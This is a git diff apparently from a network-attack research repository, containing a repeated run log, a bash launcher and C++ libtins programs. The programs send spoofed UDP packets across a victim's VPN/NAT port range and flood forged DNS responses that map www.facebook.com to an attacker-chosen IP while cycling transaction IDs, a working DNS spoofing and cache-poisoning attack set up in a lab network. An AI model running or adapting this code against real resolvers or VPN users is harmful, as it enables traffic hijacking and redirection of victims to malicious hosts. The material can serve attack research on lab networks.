+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:23:05 +Starting port fill at 2020-09-06 20:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:49:16 +Starting port fill at 2020-09-06 20:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:50:09 +Starting port fill at 2020-09-06 20:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:51:08 +Starting port fill at 2020-09-06 20:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:52:04 +Starting port fill at 2020-09-06 20:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:53:04 +Starting port fill at 2020-09-06 20:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:54:10 +Starting port fill at 2020-09-06 20:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:55:05 +Starting port fill at 2020-09-06 20:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:56:08 +Starting port fill at 2020-09-06 20:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:57:05 +Starting port fill at 2020-09-06 20:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:58:05 +Starting port fill at 2020-09-06 20:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 20:59:05 +Starting port fill at 2020-09-06 21:00:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 21:00:05 +Starting port fill at 2020-09-06 21:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 21:01:08 +Starting port fill at 2020-09-06 21:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 21:02:06 +Starting port fill at 2020-09-06 21:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 21:03:04 +Starting port fill at 2020-09-06 21:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 43000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 43000 with udps.. +Sent w size 1000 to 43000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 21:04:02 diff --git a/server-side-attack/dns-sside/phases/udder_fillup/fillup.blah b/server-side-attack/dns-sside/phases/udder_fillup/fillup.blah new file mode 100755 index 0000000..8043c4e --- /dev/null +++ b/server-side-attack/dns-sside/phases/udder_fillup/fillup.blah @@ -0,0 +1,26 @@ +#/bin/bash +# + + +START_PORT=42000 +END_PORT=62000 + + +SRC_IP=10.8.0.10 +#SRC_IP=$(ifconfig | grep inet | grep -w 10.8 | awk -F' ' '{print $2}' | awk -F':' '{print $2}') +NOW=$(date '+%F %T') +echo "Starting port fill at $NOW" + +echo "Using tun src ip: $SRC_IP" +echo "Filling up vpn port range from $START_PORT to $END_PORT.." + +sudo ./uud_send 192.168.3.2 53 $SRC_IP $START_PORT $END_PORT + +#sleep 1 + +#echo "Responding to all my own client probes to make sure they're kept in the table" + +#sudo ./uud_send 192.168.3.2 54 192.168.2.2 $START_PORT $END_PORT 1 + +NOW1=$(date '+%F %T') +echo "Finished port fill at $NOW1" diff --git a/server-side-attack/dns-sside/phases/udder_fillup/send.cpp b/server-side-attack/dns-sside/phases/udder_fillup/send.cpp new file mode 100644 index 0000000..b39eb21 --- /dev/null +++ b/server-side-attack/dns-sside/phases/udder_fillup/send.cpp @@ -0,0 +1,165 @@ +#include +#include +#include +#include +#include +#include +#include + + +using std::thread; +using std::cout; +using std::string; +using std::vector; +using namespace Tins; + + +bool is_running = true; +bool verbose = false; +bool count_resp = false; + +string dest_ip; +string server_ip; + + +void print_divider(int count) { + int i = 0; + while (i < count) { + if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + + +std::string random_string(std::size_t length) { + + const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; + + std::random_device random_device; + std::mt19937 generator(random_device()); + std::uniform_int_distribution<> distribution(0, CHARACTERS.size() - 1); + + string random_string; + + for (std::size_t i = 0; i < length; ++i) { + random_string += CHARACTERS[distribution(generator)]; + } + + return random_string; +} + + + +// Spreads UDPs across the victim's entire port range +// to find a port that is being used and the spoofed packets +// get NAT'ed back to the client +// +int spread_uds(bool server_spread, string server_ip, int server_port, string dest_ip, int start_port, int end_port) { + + PacketSender sender; + NetworkInterface iface("enp0s9"); + int i; + IP pkt; + + if (server_spread) pkt = IP(dest_ip, server_ip) / UDP(start_port, server_port); + else pkt = IP(server_ip, dest_ip) / UDP(server_port, start_port); + + UDP& udp = pkt.rfind_pdu(); + int spoof_port = start_port; + + int send_size = 0; + int send_count = 0; + string send_payload = random_string(send_size); + + + + cout << "spreading the port range from " << spoof_port << " to " << end_port << " with udps..\n"; + + + while (spoof_port < end_port) { + + if (server_spread) udp.dport(spoof_port); // set the packets src port to current guess + else udp.sport(spoof_port); + sender.send(pkt, iface); + spoof_port++; + send_size ++; + send_payload = random_string(send_size); + //cout << "next rando string: " << send_payload << "\n"; + + // if the payload size reaches 1000 (max), reset back to 0 + if (send_size >= 1000) { + send_size = 0; + cout << "Sent w size 1000 to " << spoof_port << "\n"; + } + + usleep(1); + } + + if (verbose) print_divider(2); + + return 1; + +} + + +int fill_ports(bool server_spread, string source_ip, int sport, string dest_ip, int start_port, int end_port) { + + bool filling = true; + int current_port = 0; + + while (filling) { + + current_port = spread_uds(server_spread, source_ip, sport, dest_ip, start_port, end_port); + print_divider(1); + + if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n"; + + count_resp = true; + filling = false; + print_divider(2); + + } + + return current_port; + +} + + + + +int main(int argc, char** argv) { + + cout << "arc twas: " << argc; + + if (argc != 6 && argc != 7) { + cout << "sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port )\n"; + return 0; + } + + server_ip = argv[1]; // dns server IP + int server_port = atoi(argv[2]); + dest_ip = argv[3]; // vpn server IP + int start_port = atoi(argv[4]); + int end_port = atoi(argv[5]); + bool server_spread = false; + + if (argc == 7) server_spread = true; + + verbose = true; + + string dest_mac = ""; + string src_mac = ""; + + print_divider(2); + + + int p = fill_ports(server_spread, server_ip, server_port, dest_ip, start_port, end_port); + + cout << p << "\n"; + print_divider(1); + is_running = false; + + if (verbose) cout << "Filled up all those ports and finished at: " << p << "\n"; + + return p; +} diff --git a/server-side-attack/dns-sside/phases/udder_fillup/uud_send b/server-side-attack/dns-sside/phases/udder_fillup/uud_send new file mode 100755 index 0000000..5a47259 Binary files /dev/null and b/server-side-attack/dns-sside/phases/udder_fillup/uud_send differ diff --git a/server-side-attack/dns-sside/phases/udder_test/Makefile b/server-side-attack/dns-sside/phases/udder_test/Makefile new file mode 100644 index 0000000..8737ce0 --- /dev/null +++ b/server-side-attack/dns-sside/phases/udder_test/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o uud_send send.cpp -lpthread -ltins -std=c++11 diff --git a/server-side-attack/dns-sside/phases/udder_test/send.cpp b/server-side-attack/dns-sside/phases/udder_test/send.cpp new file mode 100644 index 0000000..a188eb0 --- /dev/null +++ b/server-side-attack/dns-sside/phases/udder_test/send.cpp @@ -0,0 +1,119 @@ +#include +#include +#include +#include +#include +#include +#include + + + +using std::thread; +using std::cout; +using std::string; +using std::vector; +using namespace Tins; + + +int current_spoof_port, best_port, chack_count, resp_count, sniff_size; +bool is_running = true; +bool verbose = false; +bool count_resp = false; + +bool sniffed_resp = false; +string dest_ip; +string source_ip; + + +void print_divider(int count) { + int i = 0; + while (i < count) { + if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + + + + + +// coming from a specific remote_ip:port +// +int send_dns(string src_ip, int sport, string dest_ip, int dport) { + + PacketSender sender; + NetworkInterface iface("enp0s10"); + + IP pkt = IP(dest_ip, src_ip) / UDP(dport, sport) / DNS(); + + string spoof_domain = "www.facebook.com"; + string redirect_ip = "192.168.2.2"; + + // Add the fake response + pkt.rfind_pdu().add_query({ spoof_domain, DNS::A, DNS::IN }); + pkt.rfind_pdu().add_answer( + DNS::resource( + spoof_domain, + redirect_ip, // some bad guy IP we wanna redirect to + DNS::A, + 1, // class of the record?? + // 777 is just a random TTL + 777 + ) + ); + // We want the query to be resolverd recursively + //pkt.rfind_pdu().id(tx_id); + pkt.rfind_pdu().type(DNS::QRType::RESPONSE); + pkt.rfind_pdu().recursion_desired(1); + pkt.rfind_pdu().recursion_available(1); + + + int id = 1; + int max_id = 65000; // probably 65k or 16 bits + + int block_size = 65000 / 4; + + while (id < block_size) { + + int c = 0; + int send_id = id; + while (c < 4) { + pkt.rfind_pdu().id(send_id); + sender.send(pkt, iface); + send_id += block_size; + c ++; + } + //pkt.rfind_pdu().id(id); + //sender.send(pkt, iface); + + if (id % 1000 == 0) cout << "sending w id: " << id << "\n"; + id ++; + usleep(250); + } + + //sender.send(pkt, iface); + + return 1; + +} + + + +int main(int argc, char** argv) { + + if (argc != 5) { + cout << "sike wrong number of args ---> (src_ip, sport, dest_ip, dport)\n"; + return 0; + } + + string src_ip = argv[1]; 